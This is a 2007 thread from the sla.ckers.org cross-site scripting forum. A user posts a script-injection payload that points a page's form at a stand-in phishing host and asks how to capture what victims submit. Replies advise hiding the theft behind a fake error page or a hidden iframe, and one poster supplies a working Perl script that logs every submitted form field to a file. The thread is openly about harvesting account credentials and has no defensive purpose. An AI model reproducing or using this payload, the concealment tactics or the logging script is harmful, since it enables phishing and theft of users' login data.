Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Use Of This?
Posted by: Secks
Date: March 25, 2007 07:56PM

<script>document.forms[0].setAttribute("action", "http://www.PHISHED.com/");</script>

Now thats great for phishing accounts, but is there a way I can use it to logg all the data submitted by the user and then send it to me?

Options: ReplyQuote
Re: Use Of This?
Date: March 25, 2007 08:07PM

Forward the data to a PHP file to log it, and then set the location to the target site's error page so people think they did something incorrectly, or there was some form of a server error.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Use Of This?
Posted by: rsnake
Date: March 25, 2007 08:29PM

Yah, that is bound to be pretty obvious when the form stops working. It's better to send the data to yourself in a hidden iframe and then let the user go on their way submitting the form.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Use Of This?
Posted by: Secks
Date: March 25, 2007 08:39PM

Yea but I don't know how to logg a form that isn't on my domain.

Options: ReplyQuote
Re: Use Of This?
Posted by: Tribute
Date: March 25, 2007 08:48PM

How would you set something like this to log the data but also forward the data anyway so they actually login, as to not think something is wrong (or more wrong than what they did)?

Options: ReplyQuote
Re: Use Of This?
Posted by: Secks
Date: March 25, 2007 08:56PM

I just dont know the kind of script I would use to logg all the imputed data.

I mean I know how to set up forms that will logg the data, but not this way.



Edited 1 time(s). Last edit at 03/25/2007 09:27PM by Secks.

Options: ReplyQuote
Re: Use Of This?
Posted by: Henaro
Date: March 25, 2007 09:31PM

You could have it log the data then bring up an error message saying that there was an error, please try again. Then immediately forward them to the actual login form.

Options: ReplyQuote
Re: Use Of This?
Posted by: Secks
Date: March 25, 2007 09:32PM

Henaro

"I just dont know the kind of script I would use to logg all the imputed data."

.....

Going around in fucking circles.



Edited 1 time(s). Last edit at 03/25/2007 09:54PM by Secks.

Options: ReplyQuote
Re: Use Of This?
Date: March 25, 2007 10:56PM

PHP, use it.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Use Of This?
Posted by: rsnake
Date: March 26, 2007 11:32AM

Or PERL... logging is simple. Here's a super simple example:

#!/usr/bin/perl
print "Content-Type: text/plain\n\n";
open (LOG, ">>output.txt") or die ("Cannot open $!\n");
read( STDIN, $argstring, $ENV{CONTENT_LENGTH});
foreach (split(/&/, $argstring)) {
if (/(.*)=(.*)/) {
($nam, $val) = ($1, $2);
$val =~ s/\+/ /g ;
$val =~ s/%(..)/pack('c',hex($1))/eg;
unless (defined $in{$nam}) {
$in{$nam} = $val;
}
}
}
print LOG "$_\t$in{$_}\n" foreach (sort keys(%in));
print LOG "-----------\n";
close LOG;

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.